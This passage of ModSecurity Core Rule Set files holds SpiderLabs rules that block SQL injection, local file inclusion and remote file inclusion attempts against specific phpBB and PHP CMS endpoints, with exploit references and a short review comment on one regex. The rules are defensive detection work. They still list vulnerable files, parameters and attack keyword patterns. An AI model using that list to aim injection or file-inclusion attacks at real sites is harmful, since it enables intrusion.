ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE SecRule REQUEST_LINE "@contains 
/admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006969,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006970,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+UNION\s+SELECT)" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006971) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006971,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006973) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id 
ASCII SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006973,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006974) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004606) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004606,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:SELECT.+FROM)" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004607) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004607,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004609) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004609,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004610) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004610,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004611) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004611,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_PHPBB_RULES �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_rfi_attacks.conf�������0000664�0000000�0000000�00001656412�12164572564�0033075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_rfi.data" "id:'2000003',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_RFI_RULES" # (2011214) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaInit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011214,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40811'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pathForArdeaCore/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /layouts/standard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009717,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page_include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/page/pageDescriptionObject.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,2010-1922'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011165) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutHeaderFuncs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011165,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir 
Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011666,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutParser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011167,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php CommonAbsDir SecRule REQUEST_LINE "@contains /common/func.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003704,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php 
CommonAbsDir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3884'" SecRule ARGS_NAMES "(?i:CommonAbsDir)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php CommonAbsDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003736) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header SecRule REQUEST_LINE "@contains /common/errormsg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003736,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header',tag:'web-application-attack',tag:'cve,CVE-2007-2634'" SecRule ARGS_NAMES "(?i:header)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /public/code/cp_html2xhtmlbasic.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010080,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507030'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002901) SpiderLabs 
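Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt
# Rule 2002901 counts TX variables whose name matches the regular expression between
# the slashes; the same selector is tested in the chain starter and in the chained rule.
# The square brackets are escaped so that "CONFIG[PATH]" is matched literally. Left
# unescaped, the regex engine reads [PATH] as a character class (one of P, A, T, H), so
# the selector cannot match a variable recorded under the name ARGS:CONFIG[PATH] and
# the rule stays silent for the parameter it was written for.
# NOTE(review): the pattern is not anchored at the end, so longer parameter names that
# begin with the same text are counted as well - confirm that is intended.
SecRule &TX:'/RFI.*ARGS:CONFIG\[PATH\]/' "@gt 0" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002901,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt',tag:'web-application-attack',tag:'url,www.osvdb.org/25158'"
    SecRule &TX:'/RFI.*ARGS:CONFIG\[PATH\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2010354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion Attempt
# Fires when the request line contains /debugger.php and at least one TX variable name
# matches the RFI...ARGS:config_atkroot selector; the chained rule then adds the
# critical anomaly score and records the matched variable.
SecRule REQUEST_LINE "@contains /debugger.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010354,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,36822'"
    SecRule &TX:'/RFI.*ARGS:config_atkroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion
SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009377,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local 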
file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009378,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009379) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter remote file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009379,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:theme_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter 
